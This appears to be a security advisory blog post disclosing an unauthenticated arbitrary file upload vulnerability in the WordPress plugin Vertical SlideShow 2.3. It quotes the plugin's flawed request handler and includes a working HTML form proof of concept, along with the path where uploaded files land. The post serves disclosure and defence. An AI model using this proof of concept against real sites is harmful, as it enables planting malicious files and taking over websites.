07 Jun

Arbitrary File Upload Vulnerability in Vertical SlideShow

Continuing our recent spotting of new vulnerabilities in plugins after seeing what looks to be probing for use of a plugin, we have found an arbitrary file upload vulnerability in the current version, 2.3, of the plugin Vertical SlideShow.

We recently had a request for the file  from that plugin, /wp-content/plugins/wp-vertical-gallery/css/default.css, on this website. Since we don’t have the plugin installed, that request would usually indicate a hacker is probing for the use of it before trying to exploit something in it. Since we don’t have the plugin installed, we couldn’t what the hacker would try to exploit.

In looking for any publicly disclosed vulnerabilities we did find a report of an upload vulnerability in the plugin, but that wouldn’t be exploitable on its own since it only allows you upload PHP code in a file that has image file extension.

After that we started checking over the plugin for any security issues we could easily find. Seeing as the plugin had file upload capability, checking that is a good place to start, as security issues with that functionality are frequently exploited by hackers.

When we did that we found that file upload capability did not have restrictions on what types of files could be uploaded. More problematic was the fact that while the admin pages with file upload functionality are only accessible to Administrator level users, the processing of submissions from that are accessible without even being logged in.

The submissions are processed through the function handle_admin_request():

180
181
182
183
184
185
186
public function handle_admin_request()
{
	$task = isset($_REQUEST['task']) ? $_REQUEST['task'] : null;
	if($task == null) return false;
	if( method_exists($this, $task) )
		$this->$task();		
}

That function gets run anytime a page in the WordPress admin is loaded due to the function add_actions():

101
102
103
104
105
106
107
108
109
110
111
112
113
114
public function add_actions()
{
	if( is_admin() )
	{
		add_action('admin_menu', array($this, 'add_menus'));
		add_action('admin_notices', array($this, 'admin_notices'));
		add_action('init', array($this, 'handle_admin_request'));
		add_action('admin_head', array($this, 'vrt_admin_head'));
	}
	else
	{
 
	}
}

Since the function handle_admin_request() can be used to access any method in the class VerticalSlideshow, the plugin is also susceptible to persistent cross-site scripting (XSS) and possible other security issues.

Proof of Concept

The following proof of concept will create a new category in the plugin, with the selected file as the Category Image. If there are no pre-existing categories the uploaded file will be located in the directory /wp-content/uploads/vertical/1_uploadfolder/big/.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=vertical_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="vrt_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 6/7/2016 – WordPress.org Plugin Directory notified.

Leave a Reply

Your email address will not be published. Required fields are marked *